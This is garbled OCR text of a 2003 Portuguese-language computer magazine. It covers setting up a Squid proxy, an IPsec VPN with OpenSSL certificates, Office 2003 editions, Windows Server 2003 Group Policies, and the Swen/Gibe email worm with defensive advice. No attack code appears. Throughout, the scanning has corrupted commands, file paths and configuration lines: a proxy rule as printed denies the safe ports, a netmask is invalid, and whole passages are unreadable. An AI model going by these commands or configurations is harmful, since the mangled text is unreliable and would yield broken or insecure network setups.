http port 8080 

iep port O 

acl QUERY urlpath, regex cgi-bin N? 
no cache deny QUERY 

cache mem 16 MB 

cache dir ufs /cache 200 16 256 
redirect rewrites host header off 
acl usercomum sro 
192.168.0.0/255.255.255.0 

acl all src 0.0.0.0/0.0.0.0 

acl Safe ports port 80 443 210 119 
70 21 1025-65535 

acl CONNECT method CONNECT 
http. access allow usercomum 

http access deny Safe ports 

http access deny CONNECT 

http access deny all 

cache mgr AdministradorDintranet 
cache effective user squid 

cache effective group squid 

log jcp. queries off 

cachemgr passwd senhasquid all 
buffered logs on 


As linhas que você precisa editar 
para O proxy funcionar corretamente 
na sua rede são as seguintes: 


acl usercomum src 
192.168.0.0/255.255.255.0 


Nelas, será adicionada a rede a 


nome usercomum é referente ao acl . 
que será criado. Sempre que precisar 
indicar um acl, basta colocar o nome. 
O endereço de rede 192.168.0.0 
permite que todos os usuários que 
estão nesta faixa de endereço tenham 
acesso ao proxy. Altere este endereço 
de acordo com a sua rede 


A 


que você pretende permitir o acesso. O 


The following error was encountered: 


The dnsserver returned: 
Name Error: The domain name does not exist. 
This means that: 


Tr caca na rt ao 1 eh e hcirama pronto mt UR 
Checo vásrv comer 


Your cache administrator Is galanddewooanet com.br. 


The requested URL could not be retrieved 
While trying to retrteve the URL: htm: //mwe tod com br/ 


Unable to determine 1? address from host name for www.todw.com.br 


Generated Wed, 24 Sep 2003 12:01:54 GMT by pomaster.. (squid/2.5.STABLES) 


http access allow usercomum 


Agora, precisamos criar uma 
regra de acesso ao proxy. Com este 
comando, você habilita todos os 
usuários do acl usercomum 


http access deny all 


Esta instrução bloqueia o acesso 
ao proxy. No acl al foram incluídos 
todos os endereços da rede, inclusive 
os endereços do acl usercomum, mas 
esses serão ignorados por terem sido 
adicionados no comando anterior. 


cachemgr passwd senhasquid all 


Adiciona uma senha no utilitário 
cachemgr. Altere o campo senhasquid 
com a senha que desejar. 


Com o arquivo configurado, ative 
o cache com este comando 


* squid -z 


E inicie o serviço do sistema com 
o seguinte comando 


* squid 


O servidor já está funcionando. 
Agora, os clientes precisam se conectar 


PEC 
Acl — (Lista de Controle de Acesso) 


Especifica o nome do grupo de 
computadores como uma única regra 


Com o Squid também é possível bloquear o acesso a sites predeterminados 


a 1 


pelo servidor. Dentro do Intemet Explorer, 
acesse o menu Ferramentas e clique em 
Opções da Intemet. Vá em Conexões e 
depois em Configurações da LAN. 
Coloque no campo endereço o número 
de IP do servidor e em Porta, 8080. 

Teste o servidor acessando 
qualquer site a partir de outra 
máquina na rede. Se não acessar a 
página ou não mostrar mensagem de 
erro do Squid, verifique novamente as 
opções. O Squid tem um utilitário que 
pode ser executado junto com o 
programa para verificar o erro 


1 


* squid -d 1 


Execute o comando para 
mostrar essas informações 


Você pode configurar o Squid de 
diversas maneiras. No próprio manual 
do programa, você encontra dicas 
úteis para administradores. PEM 
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transferência de dados com o 
máximo de segurança é um 
ponto cada di 
fundamental para as 
empresas. Principalmente quando 
existe a necessidade de troca de 
informações entre filiais ou quando 
um executivo em viagem precisa 
cessar os dados que estão 
armazenados no computador de seu 
escritório. Para minimizar esses 
riscos, uma boa alternativa é montar 
uma VPN (Virtual Private Network 
em português, Rede Virtual Privada), 
que utiliza os Certificados-Chave e 
criptografa os dados transmitidos. 

A segurança das informações que 
trafegam na rede é garantida graças ao 
certificado de autenticação gerado no 
servidor e que guarda todas as chaves 
e senhas dos usuários que podem se 
conectar Para que sua rede possa 
funcionar com ainda mais segurança, 
um dos melhores programas existentes 
é o IPsec, que já está adaptado às 
úliimas versões do protocolo TGPAR 

A revista PG Master instalou uma 
VPN para fazer este tutorial utilizando 
uma rede local com dois 
computadores. O equipamento 
utilizado no teste como servidor foi 
um Pentium 2 de 400 Mhz, 64 Mb 
RAMed placas de rede com o 
Slackware 9, enquanto o clente foi 
um Pentlum 4 de 600 Mhz, 256 Mb 
ce RAM e uma placa de rede com o 
Conectiva 9. A seguir, aprenda como 


Is Pl (1) i configurar e usar O Linux para 
) transmitir dad riptografados. 


Instalando o IPsec 


! O, 
A instalação do IPsec deve ser feita 


da mesma maneira tanto para o 
servidor quanto para o computador 
e , Antes de Iniciá-la. será 
sário que sua máquina já tenha 
Instalado equintes programas 
+ Kemel-Source — é preciso que seja a 
mesma versão que está Instalada 


em seu computador 


eia) ( 


Conecte dois computadores com uma Rede Virtual Privada , opengs1 - esse programa irá criar 
para garantir a segurança na transmissão de seus dados as certificações 


A conexão dos computadores é 
feita pelo IPsec. Esse programa não 
vem instalado no sistema. Nos Linux 
que utilizam o Kemel 2.4, será 
necessária a sua compilação. O 
programa é nativo nos Kernels 
versões 2.5 e 2.6. Para iniciar a 
instalação, faça o download do 
arquivo no seguinte site: 
http://uum freeswan.ca/download php 

Existem três tipos de arquivos 
diferentes para a atualização do 
Kernel. Baixe o arquivo que está 
logo abaixo do nome Pre-Patched 
w/X.509 Support. 


Com o arquivo no computador, 
extraia-o com o comando: 


É tar -zxvpf freeswamoc.tgz -C /usr/sre 


Acesse o diretório do programa 
com o comando a seguir 


* cd /usr/src/freeswan>x/ 


Agora, será necessário compilar o 

programa junto com o Kemel 
usando os seguintes comandos 
dentro do diretório: 


& make olmod 
* make minstall 


A compilação do módulo pode 
demorar horas, dependendo do seu 
hardware. Utilizando um Athlon XP 
1.8 com 512 Mb, o tempo total de 
compilação foi de 20 minutos. 


Ao concluir, reinicie o computador 

para ativar as novas alterações. 
Verifique se o IPsec foi instalado 
corretamente executando o comando: 


* ipsec setup start 


Criando certificados 
O primeiro certificado que será 
criado é o de autorização 
(Certificado-Mestre). É nele que ficam 
guardadas as informações sobre os 
Certificados-Chave criados. Antes 
será necessário verificar onde está 


«AdemoCA": Filo extets 
E File exista 


ash 2,088 ./0R,8h ceuca 
[ER cortificaio Filenams (or entar to create) 


PNakirg CA cortificate 
ing a 1004 Bit 


about to bo asked to enter information that ut1! be incorporatad 


into our cereifucata request. 


eu ara bode vo art Iê uu (a called a Ditirguinhad Mane or a DM. 


are quite * Fou Field 
Fes fieis hero val de 2 
vou Pr ria vai be If Bla. 


ga Sao le cms 


PRO 
ntamat Uuápita Peg Ltdlidizoa Europa 


on) [1:P€- 


A criação do Certificado-Mestre é essencial para manter a segurança da rede 


instalado o utilitário CA. Para isso, 
execute o seguinte comando 


* find / -name CA* 


Normalmente, este arquivo fica 
localizado no diretório /etc/ssl/misc/, 
mas pode variar em algumas 
distribuições. Acesse o diretório onde 
ele foi encontrado. 


Para criar o Certificado-Mestre, 
digite o comando a seguir 


&./CA.sh -newca 


Ao executá-lo, será necessário 
digitar algumas informações 


Os dados que precisam ser 
inseridos estão na seguinte ordem. 

* Pressione a tecla Enter 

* Digite uma senha 

* Confirme a senha 

“br 

«sp 

* sao paulo 

* Pressione Enter 

* Pressione Enter 

* seu nome 

* endereço de e-mail 


Com o certificado criado, agora 

será necessário criar O 
Certificado-Chave. Execute 
novamente o comando, alterando o 
parâmetro newca para newreg, 
conforme o seguinte comando 


$./CA.sh -newreq 


Esse comando irá criar um 
certificado para o servidor. As 
informações que precisam ser 
inseridas nos campos são 
parecidas com o passo anterior. No 
campo do nome do usuário (YOUR 
name) digite servidor. Existem dois 
campos adicionais logo depois de 
colocar o e-mail. Basta pressionar 
Enter para concluir. 


5 Crie agora a assinatura para o 
Certificado-Chave: 


$./CA.sh -sign 


A criação da assinatura é 
simples. Na primeira opção, 
coloque a senha aplicada no 
Certificado-Mestre e nas próximas 
opções coloque Y. Pronto, todos os 
certificados foram criados » 
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Com todos os certificados 

prontos para a criação de um 
servidor VPN, é preciso colocá-los 
no devido local 


% mv newreq.pem 
/etc/ipsec.d/private/servidorkey.pem 
& mv newcert.pem 
/etc/ipsec.d/servidorCert.pem 

* cp demoCA/cacert.pem 
/etc/ipsec.d/cacerts/ 

* openssl ca -gencrl out 
/etc/ipsec.d/cris/crl.pem 


Configurando o servidor 

A primeira configuração 

que precisa ser alterada é o 
arquivo /etc/ipsec.secreis. Ele é 
responsável por indicar qual 
certificado autenticará os usuários. 
Abra esse arquivo a partir de um 
editor de texto e remova todas as 
linhas de comando. Em seguida, 
insira a linha 


: RSA servidorCert.pem "senhaarquivo" 


Substitua senhaarquivo pela 
senha que você adicionou no 
Certificado-Chave. 


Abra agora o arquivo 
fetcfipsec.conf com um 
editor de texto e remova 
todas as linhas de comando 
que estão no arquivo. Adicione 
as novas linhas conforme 
o exemplo a seguir: 
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O certificado guarda os dados dos usuários cadastrados 


config setup 
interfaces =%defaultroute 
klipsdebug=none 
plutodebug=all 
uniqueids=yes 


conn %default 
keyingtries= 1 
compress=yes 
disablearrivalcheck=no 
authby=rsasig 
leftrsasigkey=%cert 
rightrsasigkey=Sécert 


conn roadwarrior-net 
leftsubnet=192.168.0.0/24 
also=roadwarrior 


conn roadwarrior 
right=%any. 
left=%defaultroute 
leftcert=servidorCert.pem 
auto=start 
pfs=yes 


Altere a linha de comando 
leftsubnet de acordo com a 
configuração da sua rede. 


Ative as novas configurações 
reiniciando o serviço IPsec: 


* ipsec setup restart 


Execute o seguinte comando para 
saber se o arquivo josed.secrets 
reconheceu sua senha: 
* ipsec secrets 


Ao ativar o serviço, um novo endereço de rede será criado 


Se não houver nenhuma 
mensagem, a senha foi 
reconhecida normalmente. 


Configurando o cliente 

A configuração do cliente é 

semelhante à do servidor. Antes 
de começar a configurar os arquivos 
será necessário criar as certificações 
para o cliente. Dentro do servidor, 
acesse o diretório /etc/ssl/misc (altere 
o local caso o CA.sh esteja em outro 
local) e execute o comando 


* /CA.sh -newreg 


Siga o roteiro de cadastro 
da mesma maneira do servidor, 
Adicione na opção YOUR name a 
informação cliente. 


Crie o certificado de permissão 
do usuário com o comando: 


* /CAssh -sign 
Coloque a senha do 
Certificado-Mestre e Y em todos 


os outros campos. 


Renomeie os arquivos com os 
seguintes comandos 


* mv newcert.pem clienteCert.pem 
* mv newreg.pem clienteKey.pem 


Agora, será necessário copiar os 
certificados de forma segura para o 


cliente. Coloque um disquete no 
computador e, após montá-lo, copie os 
arquivos com os comandos a seguir: 


* cp clienteCert.pem /mnt/floppy/ 
cp clienteKey.pem /mnt/floppy/ 
* cp /etc/ipsec.d/servidorCert.pem 
/mnt/Hoppy/ 

% cp /etc/ipsec.d/crls/cri.pem 
/mnt/floppy/ 

& cp demoCA/cacert.pem 
/imnt/Hoppy/ 


No computador cliente, acesse o 
disquete e copie os arquivos para 
seus respectivos locais 


* cp clienteCert.pem /etc/ipsec.d/ 
* cp clienteKey.pem 
/ete/ipsec,.d/private/ 

* cp servidorCert.pem /etc/ipsec.d/ 
* cp crl.pem /etc/ipsec.d/cris/ 

é cp cacert.pem 
/ete/ipsec.d/cacerts/ 


Em seguida, a partir de um editor 

de texto, abra o arquivo 
Jetc/ipsec.secrets, remova as linhas 
de comando existentes e insira uma 
nova linha, conforme o exemplo: 


: RSA clienteKey.pem 'senhaarquivo" 
Altere a opção senhaarquivo de 
acordo com as instruções que você 


adicionou ao cadastrar o 
Certificado-Chave para o cliente. 


Clientes 


Servidor A 


No arquivo de 
configuração do IPsec, 
você precisa indicar o 
endereço IP que está no 
servidor. Abra o arquivo 
Jetcfipsec.cont a partir de 
um editor de texto e remova 
todo o conteúdo do 

arquivo. Adicione as novas 
linhas de comando da 
seguinte maneira: 


config setup 
interfaces=%defaultroute 
klipsdebug=none 
plutodebug=none 
uniqueids=yes 


conn %default 
keyingtries=0 
compress=yes 
disablearrivalcheck=no 
authby=rsasig 
leFtrsasigkey=%cert 
rightrsasigkey=%cert 


conn roadwarrior-net 
left=200.128.45.x 
leftsubnet= 192.168.0.0/255.55.255.0 
also=roadwarrior 
conn roadwarrior 
left=(ip.of.host) 
leftcert=servidorCert.pem 
right=%defaultroute 
rightcert=clienteCert.pem 
auto=add 
pfs=yes 


Clientes 


Servidor B 


ea 


qa 


Cliente IPsec 


As únicas informações que 
precisam ser modificadas para a sua 
rede funcionar são o campo left e o 
leftsubnet. No campo left, coloque o 
endereço de IP do servidor e no 
campo leftsubnet coloque o endereço 
da sua rede local 


Para ativar o serviço, execute o 
seguinte comando: 


* ipsec setup start 
 ipsec auto --up roadwarrior 
* ipsec auto --up roadwarrior-net 


Se você deseja que seu computador 
se conecte automaticamente ao servidor, 
altere a linha de comando auto=add 
do arquivo ipsec.conf do cliente para 
auto=start. 

Verifique se tudo está funcionando 
corretamente executando um ping para 
o servidor. A mensagem "Verificando IP 
seguro" deve aparecer na tela. 

Se o sinal de ping não for enviado, 
verifique o que aconteceu de errado 
analisando os logs de mensagem. O log 
de mensagem de erro fica localizado no 
arquivo Aar/log/secure e O arquivo de 
mensagem de inicialização do programa 
está em Nar/log/messages. Às vezes, a 
chave está no diretório errado. PEM 
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"+ Lançamento 


Microsoft fechou o mês de 
outubro com mais um grande 
lançamento mundial, À 
empresa colocou no mercado 
uma nova versão do mais utilizado 
aplicativo de escritório O Office 2003 
apresenta como principais vantagens 
uma maior possibilidade de interação 
entre os diversos programas e 
facilidade de uso. 
A principal inovação desta nova 


E suite é a possibilidade de compartilhar 
Conheça as novidades o uso de um mesmo arquivo por 
do novo lançamento da diversos usuários conectados a uma 
Microsoft, o Office 2003, e mesma rede, Isso só é possível graças 
À ' às novas tecnologias que estão 


saiba se vale a pena investir disponíveis nos programas da suite 
para atualizar a sua versão As modificações que Essa versão 

recebeu suprem a necessidade de 
empresas que manipulam grandes 
quantidades de arquivos, pequenas 
empresas que desejam administrar 
melhor s 2s e até mesmo 
um simples usuário. Veja quais foram 
as principais modificações aplicadas 
ao pacote 


Gerenciamento em grande escala - com a 
implementação nativa da tecnologia 
Extensible Markup Language (XML), é 
possível integrar grupos de pessoas 
para determinadas tarefas em um único 
arquivo de texto simultansamente. 


Estrutura simples e olimizata - em todas 
as ferramentas Office, a estrutura das 
janelas está mais limpa. Além disso, o 
novo Quilook conta com novos recursos 
de administração de tarefas, otimizando 


- eua 
e ainda mais o trabalho 
Sobre a nova versão 
a E = Proteção de informação e controles de 
hs alterações dos programas foram seguinte configuração: programa com o suporte a k 
feras para suprir as necessidades mais * Windows 2000 com Service gerenciamento de recursos do Windows 
tomuns que antes só eram possívais Pack'3, Windows Xº Server 2003 é possível bloquear taretas 
através da compra ce outros programas « Pentium ll | como enviar e-mail anexado, imprimir ou 
Para que nada desse emado, a Microsoft * 124 MB de memória RAM até mesmo blocuear men: 
disponibilizou para os interessados um kit * 500 MB de espaco em disco não possuem autorização. 
para teste com todos os anicativos | 
inclusos no pacote Offise. No total, foram Alérn disso, é recomendável que você | a 
— o novo Offic: 
distribuídas 600 mil cópias, três vezes mais lenha instalado um servidor que possua O pl mamão " O nova E E 
que a sua versão anterior. Para desfrutar. Windows Server 2003 com o aplicativo Reuios em sua es! pura id mig 
melhor os recursos co-novo programa; é SharePoint Service ativado para que 0 de comunicação instantânea através 
necessário que seu computador póssua a Office tenha um desempenho melhor, de e-mail ou trabalhando com 
SERRA arquivos online, utilizando o recurso 
38 PoMastor 


E Bi e Dt 
s840 34 


fia | e je e neo 
7 sbsmitea n 
8 teem uvas 


bico 2005. Ema 


qe On de 1001 
hddueo 

resecias diventos 
blgpaçes is mora 


vo pesa 
eecemidade e mepents que | iquivos, pequenas 
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ha sondagãa 


Cteimiinto ca pio papi 5 


Enem Make Lang ques 
determinadas areas em vm 


str smp e agia — Em “ode ae Eecrament 
esmas lemph. Alem dio, » mov Oudlede conta co 
esimizando vinda tos o emilio 


do é consoles de pegas — Car sapo 4 gerenciamento de 
a Sguvo 2003, é postei Maquoarterfas de envia e-mail 
anesado, expirou axé meamo bluqoen: mensagem que não possuem autorização 


Rennes a cistância - A relação entre empreses ess cada vez mts denímvics. Com iss 
eve (ce ade e ses esta ta forma de comunicação instantânea mtevés 
Se email ow tabaltanda com erquives cas nilizando o reouvo do Shure: 
Serve (disponivel mente no Windows Sgruçs 2005) 


Tecnologia XML 


De 0% [em Lhe Fes poor Gm ips 3 
E) oem PRETO EZ Ro 
A Petebteos 


| 
5) are crer | 


do SharePoint Services (dispc 
somente no Windows Server 2003). 


ível seu aplicativo, O usuário que 
pretende fazer a atualização dos 
programas precisa tomar alguns 
cuidados. Antes de fazer um 
investimento, é preciso saber se o 
Office atual não atende mais às 


Vale a pena mudar? 
Entretanto, apesar das grandes 
Inovações feitas pela Microsoft em 


Com tanta variação de produtos 
do novo Office, a Microsoft lançou 
seis versões para diferentes 
necessidades. Veja O que cada 
versão do pacote oferece: 


Microsoft Office Professional 2003 
Enterprise Edition — idea! para clientes 
corporativos. Essa versão acompanha 
toda a linha de produtos Office, 
incluindo Publisher 2003 e Business 
Contact Manager and InfoPalh 2003. 
A versão é vendida somente para 
empresas que comprarem o produto 
em grandes quantidades. 


Microsoft Office Professional 2003 
Idea! para empresas que precisar 
trabalhar com vários clientes é 
parceiros por ter suporte integrado 
XML para sistemas de back-end de 
fácil Interligação com seus cliemes. 
Disponível no varejo, instituições de 
ensino e em comautadores novos. 


Microsoft Office Standard 2003 Edition 
Possui somente os aplicativos 
násicos do Office. Encontrado 
facilmente em varejo. Melhor opção 
para licença por volume. 


Microsolt Office Small Basiness 2003 
Edillon — em pequenas empresas. 
essa será a melhor solução. Inclui as 
ferramentas de negócios Microsoft 
Office Business Contact Manager 
2008 & Microsoft Publisher 2003. 


Microsoft Office Basic 2003 Edition 
Versão exclusiva para PCs nor 
Distribuído na forma de OEM (possui 
somente o CD & contráto de licença). 


Microsoft Office Student ant Teacher 
2003 Edition — com as mesmas 
daracterísticas da versão Standard, é 
voltado para instituições de ensino. 


Em todas as opções. os programas 
Word, Excel e Oullõok já estão 
inclusos. Na versão Enterprise você 
ainda conta con às programas 
PowerPoint, Access, Publisher o 
Business Contact Manager. 


+ Lançamento 


Teste PC-Master 
TESTE 
CRER TIE O o E] 


Tecnologia KM 


À participação da tecnologia XML 
ro novo Office é essencial para o 
sucesso do programa. Veja O que 
isso muda nás suas ferramentas, 


XML — padroniza em suas propriedades 
a estrutura de dados ou infor $ 
que podem ser transmitidas usando a 
Internet ou a rede local. Isto significa 
que podem ficar disponíveis na Intemet 
utilizando um navegador comum, bem 
mo outras aplicações que precisam, 
de dados de diferentes fontes. 


Wonl - no Word 2003 é possível salvar 
esquemas de arquivos predefinidos 
através do recurso do XML. Você pode 
também salvar os arquivos já criados 
em outras versões do Word para esse 
formato. Com isso, será possivel 
utilizar O arcuivo em forma de banco 
de dados. podendo ser consultado 
por outros aplicativos que suportam | O rem re te 
esse formato, 4] Qrmia 


pe 
“una 


Excel - os dados através do esquema | 
XML podem agora ser lidos também Dime tune ira. 


pelo novo Excel 2003. Em arquivos que | teto d title 
possuem essa estrutura, pode-se res 

modificar as tabelas ou gráficos em real q sa O reupusrs, - 
time para a análise em quaiquer 1 preta isubtitie 
formato da Excel. 


Access - no Access, é ideal para 
exirair dados de uma ou mais tabelas 
da base de dados. Com o novo 
programa, Os usuários podem 
navegar pelas tabelas relacionadas e 


exportar dados definindo com a , Co acê neo 
estrutura de um XSD. tes (O etmies DONAS rd A EA E 
ESA E 


Com a tecnologia XML (XSDs) é | 
possível criar um ambiente de trabalho | 
predefinido, ende colaboradores 
podem estruturar idos sempre 
da mesma maneira, ou seje, com um 
único modelo de trabalho, 


suas necessidades e se a nova usuários ulilizarem o mesmo arquivo Ao que tudo indica, para os 
versão atende às deficiências que simultaneamente, mas isso só se você usuários que utilizam apenas o 
você encontra. tiver um servidor Windows Server básico dos programas e não 

A nova suíte da Microsoft é ideal 2003. Outra vantagem é para quem necessitam desses novos recursos, 
para trabalhos em redes, onde precisa fazer integrações de vídeo em — é melhor permanecer com a 
existe a necessidade de vários apresentações do PowerPoint. versão atual do Office. PCM 
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Tutorial Windows 


Controle sua rede com 0 E RE E 


sua rede Windows 
Server 2003 de uma 
maneira mais eficiente 
e segura com recursos 
do próprio sistema 


Por Toni Cavalheiro 


pro 
locais, evitando que os ataques 


mesma empre: 
para ajudá-lo nesta tarefa que o 
Windows Server 2003 e 
2000 disponibilizam um rec 
chamado Group Policy. 

Uma Group o 


desligada 
de uma Group Pol 
possível bloquear o 
comando Shutdown do sistema & 
a. Ee nenh uário 
ngano 


As possibilidades 
enormes. Há política 
segurança para controlar 
softwares, gerenciar o [ 

uários da rede e a 
o para evi alação 
de programas piratas dentro da 
uir, tudo o 
precisa para aproveitar 
este recurso. 


Alguns conceitos básicos 

Existem basicamente dois tipos 
de Group Policy: as locais e as de 
rede. Uma Group Policy local, como 
você já deve ter imaginado, se 
aplica às contas da própria 
máquina, ou seja, qualquer conta 
que não necessite de um logon no 
servidor, Este tipo de política pode ser 
bastante útil em uma máquina 
doméstica que é compartilhada por 
várias pessoas, mas não tem grande 
utilidade dentro de um ambiente 
corporativo. A melhor atitude que você 
deve tomar é desativar todas as 
contas locais das máquinas dos 
usuários e obrigá-los 
a se conectarem ao servidor. Com 
isso, você ganha duas coisas 
básicas: um aumento na segurança 
da rede e um suporte mais facilitado, 
uma vez que a maioria dos 
problemas poderá ser solucionada 
sem que um técnico tenha de se 
ceslocar até a máquina do usuário 

O segundo lipo de Group Policy 
é o mais interessante para ser usado 
em uma empresa. Uma Group Policy 
de rede pode limitar os poderes de 
todos os integrantes da rede. Se 


você tem um usuário que só precisa 
usar o Word, por exemplo, pode 
forçar esta configuração para que o 
editor de textos carregue sozinho 
sempre que a conta for utilizada, de 
forma que o usuário não consiga 
fechar o programa sem efetuar o 
logoff (em outras palavras, você 
carregou o Word sem chamar o 
explorer.exe). 

Mas antes de continuar, é 
preciso revisar alguns conceitos de 
redes Windows, O Windows Server 
2003 é todo baseado no Active 
Directory, um ambiente de rede que 
utiliza fiorestas, domínios, árvores e 
OUs (do inglês Organizational Unit, 
em português, Unidade 
Organizacional) para organizar sua 
rede. Este é o mesmo conceito 
usado em diversos outros 
softwares, como os servidores 
NetWare 5 ou superiores e os 
servidores Linux e UNIX que utilizam - 
LDAP Para usar as Group Policies 
de rede de uma maneira eficiente 
seu servidor deve, obrigatoriamente, 
ser promovido para Domain 
Controller, Se você ainda não tem 
um servidor com esta característica, 


O noder tas GPs 


O Windows Server 2005 conta | 
| com mais de 800 políticas que podem | 
sar configuradas de acordo com a sua 
necessidade: É claro que ninguém 
precisa ficar decorando todas dias, já 
que a ferramenta de adrminisiração de 
políticas é muito eficiente e mostra 
uma pequena descrição de cada uma 
delas. No entanto, para tacilitar um 
pouco as coisas, veja alguns dos 
recursas que você pode configurar 
com as Grotip Poleles: 


* Configurar quase totalmente 
O Internet Explorer. 


* Configurar o Windows Explorer. 


+ Bloquear O acesso ao 
Windows Update. 


* Bloquear o acesso do 
|. Painel de Controle, 


» Evilar que Os usuários: 
adicionem novas impressoras. 


* Configurar as tarefas 
do Cirl+Alt=Del 


* Definir o tempo das sessões 
dos Terminal Senices, 


* Irmpecir que o Windows 
Messenger seja executado. 


« Selecionar 08 serviços que 
serão executados na máquina 
dos usuários 


Obter logs mais completos 
dos eventos da rede. 


* Definir políticas da senhas 
mais eficientes. ) 


basta digitar o comando depromo no 
prompt e seguir o assistente de 
configuração que aparecerá na teia 

Quando você for aplicar uma 
Group Policy, o primeiro passo é 
criar uma OU. Suponha que você 
queira separar os usuários do 


marketing em um grupo e definir um » 
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Para aplicar uma Group Policy, é preciso criar uma OU 


papel de parede padrão para este 
departamento, O primeiro passo é 
criar uma OU com o nome Marketing 
e acrescentar todos os usuários 
correspondentes abaixo dela. Em 
seguida, você abre o gerenciador de 
Group Policies de rede e aplica as 
configurações necessárias. Sendo 
assim, é muito importante ter uma 
estrutura bem organizada antes de 
implementar políticas de grupos. 
Caso contrário, sua rede pode se 
tornar um verdadeiro caos 


Ferramentas de administração 

Embora o Windows Server 2003 
já ofereça diversas ferramentas de 
administração de Group Policies, é 
altamente recomendável que você 
use um software específico para 
este propósito. O nome desta 
ferramenta é Group Policy 
Management Console e seu 
download pode ser leito 


Comna 


gratuitamente em 
htto:/Anwwmicrosoft.com/ 
windowsserver2003/gprme 

Após baixar o programa e fazer a 
instalação, também é uma boa idéia 
criar um console de administração 
para facilitar a configuração de 
políticas locais e de rede. Veja a 
seguir como fazer isso: 


Clique no botão Start, selecione 

Run e digite mmc, Uma tela em 
branco do Microsolt Management 
Console aparecerá, permitindo que 
você adicione novos itens. Em 
seguida, clique em File e selecione 
AdaiRemove Snap-in (se preferir, 
utilize o atalho Cirl+M) 


Clique em Add e dê um 

clique duplo sobre o item Group 
Policy Management, Em seguida, 
faça o mesmo com o Group Policy 
Object Editor, selecione Local 


idade com estações 


Nem todas as políticas que você 
define na rede são válidas para todas as 
estações de Irabalho. Isso porque as 
versões mais antigas do Windows, como. 
09X e NT, trabalhavam de uma maneica 
totalmente diferente do Windows Server 
2009 e do Windows XP Portanto, 
sempre verifique a compalibilidade da 
política antes de defini-la para um 


“ determinado grupo de usuários, Esta 


compatibilidade aparece logo abaixo 
de cada política de segurança, em um 
carmpo denominado Supported On Se 
você vir-a mensagem “At Least 
Microsoft Windows 2000", por 
exemplo, significa que esta política só 
será válida no W2K ou em versões 
rmais novas do Windows 


Baixe o Nisnsgeriári Console direto do site Em Microsoft 


Computer e clique em Finish. 
Pressione o botão Close para fechar 
esta caixa de diálogo e dê OK 


Agora, é só salvar este console 

MMC em qualquer lugar do seu 
disco rigido, Com isso, você acaba de 
criar uma ferramenta de atalho para 
administrar as Group Policies do 
sistema, sejam elas locais ou de rede. 


Criando uma Group Policy 

A melhor maneira para entender 
como se implementa uma Group 
Policy é fazendo todo q 
procedimento na prática 
Basicamente, você precisará criar um 
objeto com as Group Policies 
cesejadas e, em seguica. criar um 
link para associá-la a uma OU 
Acompanhe passo a passo como 
criar uma Group Policy e deixar sua 
rece mais segura: 


Conecte-se como Administrator e 

abra o console MMG que você 
criou anteriormente. Duas vpções 
aparecerão no lado esquerdo da 
janela: Group Policy Management e 
Local Computer Policy. Expanda a 
primeira delas, uma vez que vamos 
criar uma nova política de rede. 


Expanda a floresta correspondente 

à sua rede, abra os domínios & 
clique sobre o seu servidor, Em 
seguida, selecione a opção Group 
Policy Objects para criar uma nova 


p Policy Management Console Setup Wizard 


Welcome to the Microsoft Group Policy 
Management Consoles Setup Wizard 


This wizard helps pou to reirstall ot remove lhe Microsoft 
Group Policy Management Console. 


Warning: This setup cannot reinstadl shared les É they are in 
use. Before proceeding, we recommend that you close any 
programs you may be runming. 


Click Cancel to quit this setup wizard and then close any 
programs you have running. Click Nest to continue with this 


reinsstallation, 


política de segurança, clique com o 
botão direito do mouse sobre ela e 
selecione New, Digite um nome para a 
política que você quer criar (por 
exemplo, Bloqueia Desktop) 


Sua nova política aparecerá na 

janela do lado direito da tela, 
Clique com o botão direito co mouse 
sobre ela e selecione Edit. Pronto, 
você chegou à tela que define as 
políticas de segurança. Apenas como 
exemplo, vá em User Configuration, 


expanda a pasta Administrative 
Templates 8 clique em Desktop. 


Uma lista com diversas opções 

aparecerá. Se você não quiser 
que um determinado usuário ajuste 
as barras de ferramentas do sisterna, 
dê um clique duplo sobre a política 

rohibit Adjusting Desktop Toolbars e 

selecione Enabled. Você pode ativar 
mais de uma política, conforme sua 
necessidade. Quando terminar, basta 
fechar a caixa de diálogo. 


Embora você já tenha 

criado uma política de 
segurança, até o momento ela não 
serve para nada. Ainda é preciso 
associá-la a uma OU do Active 
Directory. Clique com o botão 
direito sobre a OU que você quer 
associar (por exemplo, Marketing) 
e selecione Link An Existing GPO) 
Em seguida, dê um clique duplo 
sobre a política que você criou 
anteriormente. Após fazer isso, 
todos os usuários desta OU já 
passarão a respeitar suas regras 
da política de grupo. 


Isto que você conferiu é o 
básico sobre as políticas de grupos 
do Windows Server 2003, Como 
você deve ter percebido, não existe 
uma receita-padrão que se aplique 
a todos os tipos de rede. O ideal 
mesmo é você analisar as 
necessidades de cada 
departamento e, a partir cai, definir 
o que cada usuário pode ou não 
fazer dentro da rede da empresa, 

É claro que somente isso não 
deixará sua rede segura, mas pode 
apostar que diminuirá, e muito, as 
chamadas de suporte técnico 
dentro da sua empresa. PEM 
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EE NOME DO vírus: 
Swen / Gibe 

ME PLATAFORMA: 
Winaz 

HH DESCOBERTO EM: 
18/09/2003 

E TAMANHO: 
496 bytes 

HE CAPACIDADE DE REPRODUÇÃO: 
Média 

HH Risco conrorarvo: 
Baixo 

E Risco Doméstico: 


E sistEMa-aLVO: 
Windows 95/98/ME/NT! 

ME APELIDOS CONHECI 
EWorm.Swan (AVE) 
W32/Gine eMM 

iwan 

Win32 HLLM Gibe.2 (DialogueScie 


Como se defend 


Quando novas táticas de engenharia social ajudam a 


espalhar os mesmos velhos códigos destrutivos de sempre 


Por Leandro Calçada 
lgandro.calcadaQeuropanet.com.br 


mentira é tão antiga quanto a 
humanidade. Se há uma falha 
de segurança impossível de 
corrigir, esta falna é a 
capacidade humana de acreditar, 
Desde o Love Letter, centenas de 
virus têm se espalhado € 
danos pelo mundo inteiro, baseados 
apenas na capacidade das pessoas 
de se enganar frente a uma história 
razoavelmente bem contada 
Com o Swen não é diferente. Seu 
principal método de reprodução não 
depende de nenhuma falha de 
segurança, simples ou complexa, e 
ainda assim o virus tem infectado 
computadores por todo o mundo 
graças ao seu disfarce bem-feito e 
aparentemente acima de qualquer 


Q método mais eficaz para se 
defender do Swen é não abrir nenhum 
arquivo anexo de qualquer e-mail, a não 
ser que à sua procedência tenha sido 
duplamente verificada. Tambám não & 
demais saber que a Microsoft nunca 
enviou nam enviará atualizações do 
sistema por e-mai! e que. portanto, 
qualquer e-mail que ateraça algo do lipo 
é falso por natureza 

Outra dafesa eficaz é ter um antivirus 
atualizado ativo nó PC; Além dé evitar 


quiras infécções mais perigosas, 
antivirus evitará que 9 seu computador. 
seja infectado em um momeno de 
distração: O antivítus também é a 
solução perfeita para usuários 
inexperientes, para os quais U lruque do 
esrmail é quase sempre fatal. 

